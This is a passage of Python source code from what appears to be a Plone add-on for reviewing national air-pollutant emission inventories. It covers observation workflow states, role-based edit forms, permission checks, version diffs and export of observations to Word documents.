return ['MS expert comments requested', 'questionIcon']\n elif state in ['closed']:\n return ['Closed question', \"questionIcon\"]\n else:\n return ['Observation created', \"observationIcon\"]\n\n return ['Unknown', 'observationIcon']\n\n def observation_status(self):\n status = self.observation_question_status()\n my_status = self.get_status()\n\n if status in ['draft',\n 'counterpart-comments',\n 'observation-draft']:\n return 'SE'\n elif status in ['drafted', 'recalled-lr']:\n return 'LR'\n elif status in ['pending',\n 'recalled-msa',\n 'pending-answer-drafting',\n 'expert-comments']:\n return 'MSC'\n elif status in ['answered']:\n return 'answered'\n elif status in ['conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion']:\n return 'conclusions'\n elif status in ['close-requested']:\n return 'close-requested'\n elif status == 'closed':\n conclusion = self.get_conclusion()\n conclusion_reason = conclusion and conclusion.closing_reason or ''\n if (conclusion_reason == 'no-conclusion-yet'):\n return \"SE\"\n elif not my_status.endswith('closed'):\n return \"answered\"\n else:\n return \"finalised\"\n else:\n return status\n\n def observation_questions_workflow(self):\n questions = self.get_values_cat('Question')\n if not questions:\n return tuple()\n\n # there is always only one question.\n question = questions[0]\n\n items = question.values()\n\n comments = [i for i in items if i.portal_type == 'Comment']\n # answers = [i for i in items if i.portal_type == 'CommentAnswer']\n\n len_comments = len(comments)\n obs_status = self.observation_status()\n\n return tuple(['Answered'] * (len_comments - 1) + [obs_status])\n\n def overview_status(self):\n status = self.get_status()\n closed_val = 'closed ({reason})'\n if status == 'closed':\n conclusion = self.get_conclusion()\n if conclusion:\n return closed_val.format(reason=conclusion.reason_value())\n else:\n return 'open'\n\n def is_secretariat(self):\n user = api.user.get_current()\n return 'Manager' in user.getRoles()\n\n @cache(_user_name)\n def _author_name(self, userid):\n if userid:\n user = api.user.get(username=userid)\n if user:\n return user.getProperty('fullname', userid)\n\n return userid\n\n def get_author_name(self, userid=None):\n if not userid:\n userid = self.Creator()\n\n return self._author_name(userid)\n\n def myHistory(self):\n observation_history = self.workflow_history.get(\n 'esd-review-workflow', [])\n observation_wf = []\n question_wf = []\n for item in observation_history:\n item['role'] = item['actor']\n item['object'] = 'observationIcon'\n item['author'] = self.get_author_name(item['actor'])\n i_rstate = item['review_state']\n i_action = item['action']\n if i_rstate == 'draft':\n item['state'] = 'Draft observation'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif (i_rstate == 'pending' and i_action == \"approve\"):\n item['state'] = 'Pending'\n # Do not add\n elif i_rstate == 'pending' and i_action == \"reopen\":\n item['state'] = 'Observation reopened'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif i_rstate == 'pending':\n item['state'] = 'Pending'\n # Do not add\n elif i_rstate == 'closed':\n item['state'] = 'Closed observation'\n item['role'] = \"Lead Reviewer\"\n observation_wf.append(item)\n elif i_rstate == 'close-requested':\n item['state'] = 'Finalisation requested'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif (i_rstate in ('conclusions', 'conclusions-lr-denied')\n and i_action == \"deny-finishing-observation\"):\n 
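# the LR rejected the request to finish the observation\n                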
item['state'] = 'Finalisation denied'\n                item['role'] = \"Lead reviewer\"\n                observation_wf.append(item)\n            elif (i_rstate == 'conclusions-lr-denied'\n                    and i_action == \"recall-lr\"):\n                item['state'] = 'Recalled by LR'\n                item['role'] = \"Lead reviewer\"\n                observation_wf.append(item)\n            elif i_rstate == 'closed' and i_action == \"recall-lr\":\n                item['state'] = 'Recalled by LR'\n                item['role'] = \"Lead reviewer\"\n                observation_wf.append(item)\n            elif i_rstate == 'conclusion-discussion':\n                item['state'] = 'Conclusion comments requested'\n                item['role'] = \"Sector Expert\"\n                item['object'] = 'conclusionIcon'\n                observation_wf.append(item)\n            elif i_rstate == 'conclusions' and i_action == \"finish-comments\":\n                item['state'] = 'Conclusion comments closed'\n                item['role'] = \"Sector Expert\"\n                item['object'] = 'conclusionIcon'\n                observation_wf.append(item)\n            elif i_rstate == 'conclusions' and i_action == \"draft-conclusions\":\n                item['state'] = 'Conclusion drafting'\n                item['role'] = \"Sector Expert\"\n                item['object'] = 'conclusionIcon'\n                observation_wf.append(item)\n            else:\n                item['state'] = '*' + i_rstate + '*'\n                observation_wf.append(item)\n\n        history = list(observation_wf)\n        question = self.get_question()\n\n        if question:\n            question_history = question.workflow_history.get(\n                'esd-question-review-workflow', [])\n            for item in question_history:\n                item['role'] = item['actor']\n                item['object'] = 'questionIcon'\n                item['author'] = self.get_author_name(item['actor'])\n                i_rstate = item['review_state']\n                i_action = item['action']\n                if i_rstate == 'draft' and i_action == \"reopen\":\n                    item['state'] = 'Draft question'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'counterpart-comments':\n                    item['state'] = 'Requested counterparts comments'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'draft' and i_action == 'send-comments':\n                    item['state'] = 'Counterparts comments closed'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'drafted':\n                    item['state'] = 'Sent to LR'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'draft' and i_action == 'recall-sre':\n                    item['state'] = 'Question recalled'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'draft' and i_action == 'redraft':\n                    item['state'] = 'Question redrafted'\n                    item['role'] = \"Sector Expert\"\n                    question_wf.append(item)\n                elif i_rstate == 'draft':\n                    # Do not add\n                    pass\n                elif i_rstate == 'pending' and i_action == 'approve-question':\n                    item['state'] = (\n                        'Question approved and '\n                        'sent to MS coordinator')\n                    item['role'] = \"Lead reviewer\"\n                    question_wf.append(item)\n                elif i_rstate == 'recalled-lr':\n                    item['state'] = 'Question recalled'\n                    item['role'] = \"Lead reviewer\"\n                    question_wf.append(item)\n                elif i_rstate == 'answered':\n                    item['state'] = 'Answer sent'\n                    item['role'] = \"Member state coordinator\"\n                    question_wf.append(item)\n                elif i_rstate == 'expert-comments':\n                    item['state'] = 'MS expert comments requested'\n                    item['role'] = \"Member state coordinator\"\n                    question_wf.append(item)\n                elif i_rstate == 'pending-answer-drafting':\n                    item['state'] = 'Member state expert comments closed'\n                    item['role'] = \"Member state coordinator\"\n                    question_wf.append(item)\n                elif i_rstate == 'recalled-msa':\n                    item['state'] = 'Answer recalled'\n                    item['role'] = \"Member state coordinator\"\n                    question_wf.append(item)\n                elif i_action == 'validate-answer-msa':\n                    item['state'] = 
'Answer acknowledged'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft' and i_action == \"reopen\":\n item['state'] = 'Reopened'\n # Do not add\n elif i_rstate == 'closed':\n item['state'] = 'Closed'\n # Do not add\n else:\n item['state'] = '*' + i_rstate + '*'\n item['role'] = item['actor']\n question_wf.append(item)\n\n history = list(observation_wf) + list(question_wf)\n\n history.sort(key=lambda x: x[\"time\"], reverse=False)\n return history\n\n def can_edit(self):\n sm = getSecurityManager()\n return sm.checkPermission('Modify portal content', self)\n\n def get_question(self):\n questions = self.get_values_cat('Question')\n\n if questions:\n question = questions[-1]\n return question\n\n def observation_question_status(self):\n questions = self.get_values_cat('Question')\n if self.get_status() != 'pending':\n if self.get_status() in ['conclusions', 'conclusions-lr-denied']:\n if questions:\n question = questions[-1]\n question_state = api.content.get_state(question)\n if question_state != 'closed':\n return question_state\n return self.get_status()\n else:\n if questions:\n question = questions[-1]\n state = api.content.get_state(question)\n return state\n else:\n return \"observation-draft\"\n\n def observation_css_class(self):\n if self.highlight:\n if self.get_status() == \"closed\":\n con = self.get_conclusion()\n if con:\n if con.closing_reason == \"technical-correction\":\n return 'technicalCorrectionBackground'\n\n elif 'ptc' in self.highlight:\n return 'ptcBackground'\n\n def observation_is_potential_significant_issue(self):\n if self.highlight:\n return 'psi' in self.highlight\n return False\n\n def observation_is_potential_technical_correction(self):\n if self.highlight:\n return 'ptc' in self.highlight\n return False\n\n def observation_is_technical_correction(self):\n if self.highlight:\n return 'tc' in self.highlight\n return False\n\n def observation_is_revised_estimate(self):\n if self.highlight:\n return 'rev-est' in self.highlight\n return False\n\n def get_conclusion(self):\n conclusions = self.get_values_cat('Conclusions')\n mtool = api.portal.get_tool('portal_membership')\n if conclusions and mtool.checkPermission('View', conclusions[0]):\n return conclusions[0]\n return None\n\n def last_question_reply_number(self):\n questions = self.get_values_cat('Question')\n replynum = 0\n if questions:\n comments = [\n c for c in questions[-1].values()\n if c.portal_type == \"Comment\"\n ]\n if comments:\n last = comments[-1]\n disc = IConversation(last)\n return disc.total_comments\n\n return replynum\n\n def last_answer_reply_number(self):\n questions = self.get_values_cat('Question')\n replynum = 0\n if questions:\n comments = [\n c for c in questions[-1].values()\n if c.portal_type == \"CommentAnswer\"\n ]\n if comments:\n last = comments[-1]\n disc = IConversation(last)\n return disc.total_comments\n\n return replynum\n\n def reply_comments_by_mse(self):\n question = self.get_question()\n commentators = []\n if question:\n commentators = list(\n set(\n chain.from_iterable(\n [\n IConversation(c).commentators\n for c in question.values()\n ]\n )\n )\n )\n\n return [\n uid\n for uid in commentators\n if ROLE_MSE in api.user.get_roles(username=uid, obj=self)\n ]\n\n def observation_already_replied(self):\n\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[0]\n winfo = question.workflow_history\n this_year = datetime.datetime.now().year\n # [refs #134160] only count events that happened this year\n # 
as the Observation may be a carry-over.\n states = [\n w.get('review_state')\n for w in winfo.get('esd-question-review-workflow', [])\n if w[\"time\"].year() == this_year\n ]\n if states:\n sp = { s: idx for idx, s in enumerate(states) }\n return (\n states[-1] not in [\n 'recalled-msa',\n 'pending',\n 'pending-answer-drafting',\n 'expert-comments',\n ]\n and sp.get('answered')\n )\n\n return False\n\n def can_add_followup(self):\n status = self.get_status()\n return status in ['conclusions', 'conclusions-lr-denied']\n\n\ndef set_form_widgets(form_instance):\n fields = form_instance.fields\n widgets = form_instance.widgets\n if 'IDublinCore.title' in fields.keys():\n fields['IDublinCore.title'].field.required = False\n widgets['IDublinCore.title'].mode = interfaces.HIDDEN_MODE\n widgets['IDublinCore.description'].mode = interfaces.HIDDEN_MODE\n\n w_activity_data = widgets['activity_data']\n if _is_projection(form_instance.context):\n for fname in ['nfr_code', 'nfr_code_inventory']:\n nfr_w = widgets.get(fname)\n\n # [refs #250017] Projections: Hiding the review subsectors options\n if fname == 'nfr_code_inventory':\n nfr_w.mode = interfaces.HIDDEN_MODE\n\n if nfr_w: # Some users don't get to edit the nfr_code.\n nfr_w.label = get_nfr_title_projection(fname)\n\n widgets['fuel'].mode = interfaces.HIDDEN_MODE\n widgets['activity_data_type'].template = Z3ViewPageTemplateFile(\n 'templates/widget_activity_type.pt'\n )\n w_activity_data.template = Z3ViewPageTemplateFile(\n 'templates/widget_activity.pt'\n )\n w_activity_data.activity_data_registry = json.dumps(\n get_registry_interface_field_data(\n INECDVocabularies,\n 'activity_data'\n )\n )\n # # [refs #104852] hide fields for PROJECTION_HIDE_YEARS users\n # if projection_hide_for_user():\n # widgets['year'].mode = interfaces.HIDDEN_MODE\n # widgets['reference_year'].mode = interfaces.HIDDEN_MODE\n else:\n w_activity_data.mode = interfaces.HIDDEN_MODE\n widgets['scenario'].mode = interfaces.HIDDEN_MODE\n widgets['activity_data_type'].mode = interfaces.HIDDEN_MODE\n widgets['pollutants'].template = Z3ViewPageTemplateFile(\n 'templates/widget_pollutants.pt'\n )\n widgets['nfr_code_inventory'].mode = interfaces.HIDDEN_MODE\n\n widgets['text'].rows = 15\n widgets['highlight'].template = Z3ViewPageTemplateFile(\n 'templates/widget_highlight.pt'\n )\n form_instance.groups = [\n g for g in form_instance.groups if\n g.label == 'label_schema_default'\n ]\n\n\ndef set_form_fields(form_instance):\n fields = form_instance.fields\n if _is_projection(form_instance.context):\n hide_for_user = projection_hide_for_user()\n if hide_for_user:\n del fields['year']\n del fields['reference_year']\n fields['parameter'].field = schema.List(\n title=u\"Parameter\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.parameter',\n ),\n required=False,\n )\n fields['pollutants'].field = schema.List(\n title=u\"Pollutants\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.pollutants',\n ),\n required=False,\n )\n else:\n fields['year'].field = schema.List(\n title=u'Projection year',\n description=(\n u\"Projection year is the year or a \"\n \"list of years \"\n u\"(e.g. 
'2050', '2025, 2030') when the emissions had\"\n u\" occured for which an issue was observed in the review.\"\n ),\n value_type=schema.Choice(\n values=[\n u'2025',\n u'2030',\n u'2040',\n u'2050',\n ]\n ),\n required=True,\n __name__='year', # otherwise there will be no value on edit\n )\n\n fields['year'].widgetFactory = CheckBoxFieldWidget\n else:\n del fields['reference_year']\n\n\nclass EditForm(edit.DefaultEditForm):\n def updateFields(self):\n super(EditForm, self).updateFields()\n set_form_fields(self)\n\n user = api.user.get_current()\n roles = api.user.get_roles(username=user.getId(), obj=self.context)\n fields = []\n if 'Manager' in roles:\n fields = field.Fields(IObservation)\n elif ROLE_SE in roles:\n fields = [f for f in field.Fields(IObservation) if f not in [\n 'country',\n 'nfr_code',\n 'review_year',\n 'technical_corrections',\n 'closing_comments',\n 'closing_deny_comments',\n\n ]]\n elif ROLE_LR in roles:\n fields = ['text', 'highlight']\n\n self.fields = self.fields.select(\n *set(fields).intersection(self.fields))\n\n self.groups = [g for g in self.groups if\n g.label == 'label_schema_default']\n\n checkbox_fields = [\n 'parameter', 'highlight', 'pollutants',\n 'activity_data', 'scenario_type'\n ]\n\n for cb in checkbox_fields:\n if cb in fields:\n self.fields[cb].widgetFactory = CheckBoxFieldWidget\n\n def updateWidgets(self):\n super(EditForm, self).updateWidgets()\n set_form_widgets(self)\n if _is_projection(self.context):\n saved_year = self.context.year\n if saved_year:\n for item in self.widgets['year'].items:\n if item['value'] in saved_year:\n item['checked'] = True\n\n def updateActions(self):\n super(EditForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n @button.buttonAndHandler(_(u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n if errors:\n self.status = self.formErrorsMessage\n return\n content = self.getContent()\n for key, value in data.items():\n if data[key] is interfaces.NOT_CHANGED:\n continue\n content._setPropValue(key, value)\n IStatusMessage(self.request).addStatusMessage(\n self.success_message, u\"info\"\n )\n self.request.response.redirect(self.nextURL())\n\n notify(ObjectModifiedEvent(content))\n\n @button.buttonAndHandler(_(u'Cancel'), name='cancel')\n def handleCancel(self, action):\n super(EditForm, self).handleCancel(self, action)\n\n\nclass AddForm(add.DefaultAddForm):\n label = 'Observation'\n description = ' '\n\n def updateFields(self):\n super(AddForm, self).updateFields()\n set_form_fields(self)\n\n def updateWidgets(self):\n super(AddForm, self).updateWidgets()\n set_form_widgets(self)\n\n def updateActions(self):\n super(AddForm, self).updateActions()\n self.actions['save'].title = u'Save Observation'\n self.actions['save'].addClass('defaultWFButton')\n self.actions['cancel'].title = u'Delete Observation'\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n def create(self, data):\n fti = getUtility(IDexterityFTI, name=self.portal_type)\n container = aq_inner(self.context)\n content = createObject(fti.factory)\n if hasattr(content, '_setPortalTypeName'):\n content._setPortalTypeName(fti.getId())\n\n # Acquisition wrap temporarily to satisfy things like vocabularies\n # depending on tools\n if IAcquirer.providedBy(content):\n content = content.__of__(container)\n id = str(int(time()))\n content.title = id\n content.id = id\n for key, value in data.items():\n content._setPropValue(key, value)\n 
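# let event subscribers (e.g. catalog indexing) react to the new values\n        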
notify(ObjectModifiedEvent(container))\n\n return aq_base(content)\n\n\nclass AddView(add.DefaultAddView):\n form = AddForm\n\n\nclass ObservationMixin(DefaultView):\n\n @property\n def user_roles(self):\n user = api.user.get_current()\n return api.user.get_roles(\n username=user.getId(), obj=self.context\n )\n\n def wf_info(self):\n context = aq_inner(self.context)\n wf = getToolByName(context, 'portal_workflow')\n comments = wf.getInfoFor(\n self.context, 'comments', wf_id='esd-review-workflow')\n actor = wf.getInfoFor(\n self.context, 'actor', wf_id='esd-review-workflow')\n tim = wf.getInfoFor(\n self.context, 'time', wf_id='esd-review-workflow')\n return {'comments': comments, 'actor': actor, 'time': tim}\n\n def isManager(self):\n sm = getSecurityManager()\n context = aq_inner(self.context)\n return sm.checkPermission('Manage portal', context)\n\n def get_menu_actions(self):\n context = aq_inner(self.context)\n menu_items = getMenu(\n 'plone_contentmenu_workflow',\n context,\n self.request\n )\n return [mitem for mitem in menu_items if not hidden(mitem)]\n\n def get_questions(self):\n return IContentListing(self.context.get_values_cat('Question'))\n\n def can_delete_observation(self):\n is_draft = self.context.get_status() in ['pending', 'draft']\n questions = len(self.context.get_values_cat('Question'))\n # If observation has conclusion cannot be deleted (Ticket #26992)\n conclusions = len(self.context.get_values_cat('Conclusions'))\n return is_draft and not questions and not conclusions\n\n def can_add_question(self):\n sm = getSecurityManager()\n questions = len(self.context.get_values_cat('Question'))\n p_add = 'emrt.necd.content: Add Question'\n return sm.checkPermission(p_add, self.context) and not questions\n\n def can_edit(self):\n sm = getSecurityManager()\n # If observation has conclusion cannot be edited (Ticket #26992)\n conclusions = len(self.context.get_values_cat('Conclusions'))\n p_edit = 'Modify portal content'\n return sm.checkPermission(p_edit, self.context) and not conclusions\n\n def get_conclusion(self):\n sm = getSecurityManager()\n conclusions = self.context.get_values_cat('Conclusions')\n if conclusions and sm.checkPermission('View', conclusions[0]):\n return conclusions[0]\n\n return None\n\n def existing_conclusion(self):\n conclusion = self.get_conclusion()\n return conclusion and True or False\n\n def can_add_conclusion(self):\n sm = getSecurityManager()\n question_state = api.content.get_state(self.question())\n\n return sm.checkPermission(\n 'emrt.necd.content: Add Conclusions', self.context\n ) and question_state in ['draft', 'drafted', 'pending', 'closed']\n\n def show_description(self):\n questions = self.get_questions()\n sm = getSecurityManager()\n if questions:\n question = questions[-1]\n return sm.checkPermission('View', question.getObject())\n else:\n return ms_user.hide_from_ms(self.context)\n\n def show_internal_notes(self):\n return ms_user.hide_from_ms(self.context)\n\n def can_view_redraft_reason(self):\n sm = getSecurityManager()\n return sm.checkPermission(P_OBS_REDRAFT_REASON_VIEW, self.context)\n\n def add_question_form(self):\n form_instance = AddQuestionForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def has_local_notifications_settings(self):\n user = api.user.get_current()\n adapted = INotificationUnsubscriptions(self.context)\n data = adapted.get_user_data(user.getId())\n\n return data and True or False\n\n # Question view\n def question(self):\n questions = 
self.get_questions()\n if questions:\n return questions[0].getObject()\n\n def get_chat(self):\n sm = getSecurityManager()\n question = self.question()\n if question:\n values = [\n v for v in question.values()\n if sm.checkPermission('View', v)\n ]\n return values\n\n def is_old_qa(self, comment):\n return comment.modification_date.year() < datetime.datetime.now().year\n\n def actions(self):\n context = aq_inner(self.context)\n question = self.question()\n observation_menu_items = getMenu(\n 'plone_contentmenu_workflow',\n context,\n self.request\n )\n menu_items = observation_menu_items\n if question:\n question_menu_items = getMenu(\n 'plone_contentmenu_workflow',\n question,\n self.request\n )\n # remove add-followup-question action\n # if the permission check is False\n if not self.can_add_follow_up_question():\n question_menu_items = [\n item for item in question_menu_items\n if not item['action'].endswith('add-followup-question')\n ]\n\n menu_items = question_menu_items + observation_menu_items\n return [mitem for mitem in menu_items if not hidden(mitem)]\n\n def get_user_name(self, userid, question=None):\n # check users\n if question is not None:\n country = self.context.country_value()\n sector = self.context.ghg_source_sectors_value()\n if question.portal_type == 'Comment':\n return ' - '.join([country, sector])\n elif question.portal_type == 'CommentAnswer':\n return ' - '.join([country, 'Coordinator'])\n\n if userid:\n user = api.user.get(username=userid)\n return user.getProperty('fullname', userid)\n return ''\n\n def can_add_follow_up_question(self):\n return getUtility(IFollowUpPermission)(self.question())\n\n def can_add_answer(self):\n sm = getSecurityManager()\n question = self.question()\n if question:\n p_add = 'emrt.necd.content: Add CommentAnswer'\n permission = sm.checkPermission(p_add, question)\n questions = [\n q for q in question.values()\n if q.portal_type == 'Comment'\n ]\n answers = [\n q for q in question.values()\n if q.portal_type == 'CommentAnswer'\n ]\n return permission and len(questions) > len(answers)\n else:\n return False\n\n def add_answer_form(self):\n form_instance = AddAnswerForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def add_comment_form(self):\n form_instance = AddCommentForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def in_conclusions(self):\n state = self.context.get_status()\n return state in [\n 'conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion',\n 'close-requested',\n 'closed',\n ]\n\n def get_last_editable_thing(self):\n CONCLUSIONS_PHASE_2 = [\n 'conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion',\n 'close-requested',\n ]\n\n state = self.context.get_status()\n if state in CONCLUSIONS_PHASE_2:\n return self.context.get_conclusion()\n else:\n question = self.question()\n if question is not None:\n qs = question.get_questions()\n return qs[-1].getObject() if qs else None\n\n return None\n\n def update(self):\n context = self.get_last_editable_thing()\n if context is not None:\n if context.can_edit():\n try:\n hist_meta = self.repo_tool.getHistoryMetadata(context)\n except Exception:\n hist_meta = None\n if hist_meta:\n retrieve = hist_meta.retrieve\n getId = hist_meta.getVersionId\n history = self.history = []\n hist_meta_len = hist_meta.getLength(countPurged=False)\n # Count backwards from most recent to least recent\n for i in xrange(hist_meta_len - 1, -1, -1):\n version = (\n 
retrieve(i, countPurged=False)['metadata'].copy()\n )\n version['version_id'] = getId(i, countPurged=False)\n history.append(version)\n dt = getToolByName(self.context, \"portal_diff\")\n\n version1 = self.request.get(\"one\", None)\n version2 = self.request.get(\"two\", None)\n\n if version1 is None and version2 is None:\n self.history.sort(\n lambda x, y: cmp(\n x.get('version_id', ''),\n y.get('version_id')\n ),\n reverse=True\n )\n version1 = self.history[-1].get(\n 'version_id', 'current')\n if len(self.history) > 1:\n version2 = self.history[-2].get(\n 'version_id', 'current')\n else:\n version2 = 'current'\n elif version1 is None:\n version1 = 'current'\n elif version2 is None:\n version2 = 'current'\n\n self.request.set('one', version1)\n self.request.set('two', version2)\n changeset = dt.createChangeSet(\n self.getVersion(version2),\n self.getVersion(version1),\n id1=self.versionTitle(version2),\n id2=self.versionTitle(version1))\n self.changes = [\n change for change in changeset.getDiffs()\n if not change.same\n ]\n\n @property\n def repo_tool(self):\n return getToolByName(self.context, \"portal_repository\")\n\n def getVersion(self, version):\n context = self.get_last_editable_thing()\n if version == \"current\":\n return context\n else:\n return self.repo_tool.retrieve(context, int(version)).object\n\n def versionName(self, version):\n \"\"\"\n Copied from @@history_view\n Translate the version name. This is needed to allow translation\n when `version` is the string 'current'.\n \"\"\"\n return _CMFE(version)\n\n def versionTitle(self, version):\n version_name = self.versionName(version)\n\n return translate(\n _CMFE(\n u\"version ${version}\",\n mapping=dict(version=version_name)\n ),\n context=self.request\n )\n\n def isChatCurrent(self):\n status = api.content.get_state(self.context)\n if status in ['draft', 'pending']:\n return True\n else:\n return False\n\n\nclass ObservationView(ObservationMixin):\n def get_current_counterparters(self):\n \"\"\" Return list of current counterparters,\n if the user can see counterpart action\n \"\"\"\n actions = [action['action'] for action in self.actions()]\n if not any('counterpart_form' in action for action in actions):\n return []\n\n target = self.context\n local_roles = target.get_local_roles()\n users = [\n u[0] for u in local_roles if ROLE_CP in u[1]\n ]\n return [api.user.get(user) for user in users]\n\n def can_export_observation(self):\n sm = getSecurityManager()\n return sm.checkPermission(\n 'emrt.necd.content: Export an Observation', self.context\n )\n\n def is_projection(self):\n return _is_projection(self.context.aq_parent)\n\n def carryover_source(self):\n result = None\n if getattr(self.context, \"carryover_from\", None):\n carryover_source_path = getattr(self.context, \"carryover_source_path\", None)\n if carryover_source_path:\n try:\n portal = api.portal.get()\n result = portal.restrictedTraverse(carryover_source_path)\n except Exception:\n pass\n if not result:\n my_path = self.context.getPhysicalPath()\n my_year = int(re.match(RE_YEAR, my_path[-2]).group())\n catalog = api.portal.get_tool(\"portal_catalog\")\n found = catalog(\n portal_type=\"Observation\",\n id=self.context.getId(),\n sort_on=\"modified\",\n sort_order=\"descending\"\n )\n candidates = []\n for brain in found:\n their_path = brain.getPath().split(\"/\")\n if their_path != my_path:\n their_year = int(re.match(RE_YEAR, their_path[-2]).group())\n if my_year > their_year:\n candidates.append(brain)\n if candidates:\n result = 
candidates[0].getObject()\n\n return result\n\n def carryover_source_view(self):\n source = self.carryover_source()\n if source:\n return getMultiAdapter((source, self.request), name=\"view\")\n\n\nclass ExportAsDocView(ObservationMixin):\n\n def strip_special_chars(self, s):\n \"\"\" return s without special chars\n \"\"\"\n return re.sub(r'\\s+', ' ', s)\n\n def build_file(self):\n is_projection = _is_projection(self.context)\n document = Document()\n\n # Styles\n style = document.styles.add_style(\n 'Label Bold', WD_STYLE_TYPE.PARAGRAPH)\n style.font.bold = True\n style = document.styles.add_style(\n 'Table Cell', WD_STYLE_TYPE.PARAGRAPH)\n style.font.size = Pt(9)\n style = document.styles.add_style(\n 'Table Cell Bold', WD_STYLE_TYPE.PARAGRAPH)\n style.font.size = Pt(9)\n style.font.bold = True\n\n document.add_paragraph('Ref. Number')\n document.add_heading(self.context.getId(), 0)\n\n document.add_paragraph('')\n table = document.add_table(rows=1, cols=6)\n hdr_cells = table.rows[0].cells\n hdr_cells[0].text = 'Country'\n hdr_cells[0].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[1].text = 'Sector'\n hdr_cells[1].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[2].text = 'Pollutants'\n hdr_cells[2].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[3].text = 'Reference year' if is_projection else 'Fuel'\n hdr_cells[3].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[4].text = 'Projection year' if is_projection \\\n else 'Inventory year'\n hdr_cells[4].paragraphs[0].style = \"Table Cell Bold\"\n if is_projection:\n hdr_cells[5].text = \"Activity data type\"\n hdr_cells[5].paragraphs[0].style = \"Table Cell Bold\"\n\n row_cells = table.add_row().cells\n row_cells[0].text = self.context.country_value() or ''\n row_cells[0].paragraphs[0].style = \"Table Cell\"\n row_cells[1].text = self.context.ghg_source_sectors_value() or ''\n row_cells[1].paragraphs[0].style = \"Table Cell\"\n row_cells[2].text = self.context.pollutants_value() or ''\n row_cells[2].paragraphs[0].style = \"Table Cell\"\n row_cells[3].text = get_vocabulary_value(\n self.context,\n IObservation['fuel'].vocabularyName,\n self.context.fuel\n ) if not is_projection else str(self.context.reference_year)\n row_cells[3].paragraphs[0].style = \"Table Cell\"\n row_cells[4].text = self.context.year or ''\n row_cells[4].paragraphs[0].style = \"Table Cell\"\n if is_projection:\n row_cells[5].text = self.context.activity_data_type or ''\n row_cells[5].paragraphs[0].style = \"Table Cell\"\n document.add_paragraph('')\n\n document.add_heading('Observation details', level=2)\n\n document.add_paragraph('')\n table = document.add_table(rows=1, cols=4)\n hdr_cells = table.rows[0].cells\n hdr_cells[0].text = 'Review Year'\n hdr_cells[1].text = 'Parameter'\n hdr_cells[2].text = 'Key category'\n hdr_cells[3].text = 'Last update'\n hdr_cells[0].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[1].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[2].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[3].paragraphs[0].style = \"Table Cell Bold\"\n\n row_cells = table.add_row().cells\n row_cells[0].text = \"%s\" % self.context.review_year or ''\n row_cells[1].text = self.context.parameter_value() or ''\n if self.context.ms_key_category:\n row_cells[2].text = \"MS Key category\"\n else:\n row_cells[2].text = \"\"\n row_cells[3].text = self.context.modified().strftime(\n '%d %b %Y, %H:%M CET'\n )\n row_cells[0].paragraphs[0].style = \"Table Cell\"\n row_cells[1].paragraphs[0].style = \"Table Cell\"\n 
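# the remaining cells reuse the 9pt 'Table Cell' style defined above\n        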
row_cells[2].paragraphs[0].style = \"Table Cell\"\n row_cells[3].paragraphs[0].style = \"Table Cell\"\n document.add_paragraph('')\n\n document.add_paragraph('Description flags', style=\"Label Bold\")\n document.add_paragraph(self.context.highlight_value())\n document.add_paragraph(\n 'Short description by sector expert', style=\"Label Bold\")\n document.add_paragraph(self.context.text)\n if is_projection:\n document.add_paragraph('Scenario Type', style=\"Label Bold\")\n document.add_paragraph(self.context.scenario_type_value())\n if self.context.nfr_code_inventory:\n document.add_paragraph(\n 'NFR Inventories Category Code', style=\"Label Bold\"\n )\n document.add_paragraph(self.context.nfr_code_inventory)\n document.add_paragraph('Activity Data', style=\"Label Bold\")\n document.add_paragraph('\\n'.join(\n self.context.activity_data_value()\n ))\n\n if self.context.get_status() == 'close-requested':\n document.add_heading('Finish observation', level=2)\n document.add_heading('Observation Finish Requested', level=3)\n document.add_paragraph(\n 'SE comments on finish observation request:',\n style=\"Label Bold\"\n )\n\n conclusion_2 = self.get_conclusion()\n if conclusion_2:\n document.add_page_break()\n document.add_heading('Conclusions', level=2)\n\n document.add_paragraph(\n 'Final status of observation:', style=\"Label Bold\")\n document.add_paragraph(conclusion_2.reason_value())\n document.add_paragraph(\n 'Recommendation/internal note:', style=\"Label Bold\")\n document.add_paragraph(conclusion_2.text)\n\n chats = self.get_chat()\n if chats:\n document.add_heading('Q&A', level=2)\n for chat in chats:\n date = chat.effective_date\n sent_info = \"Sent on: %s\"\n if not date:\n date = chat.modified()\n sent_info = \"Updated on: %s\"\n\n if chat.portal_type.lower() == 'comment':\n document.add_paragraph(\n '> %s' % self.strip_special_chars(chat.text)\n )\n document.add_paragraph(\n \"From TERTs To Member State \\t\\t %s\" % (\n sent_info % date.strftime('%d %b %Y, %H:%M CET')\n )\n )\n\n if chat.portal_type.lower() == 'commentanswer':\n document.add_paragraph(\n '< %s' % self.strip_special_chars(chat.text)\n )\n document.add_paragraph(\n \"From Member State To TERTs 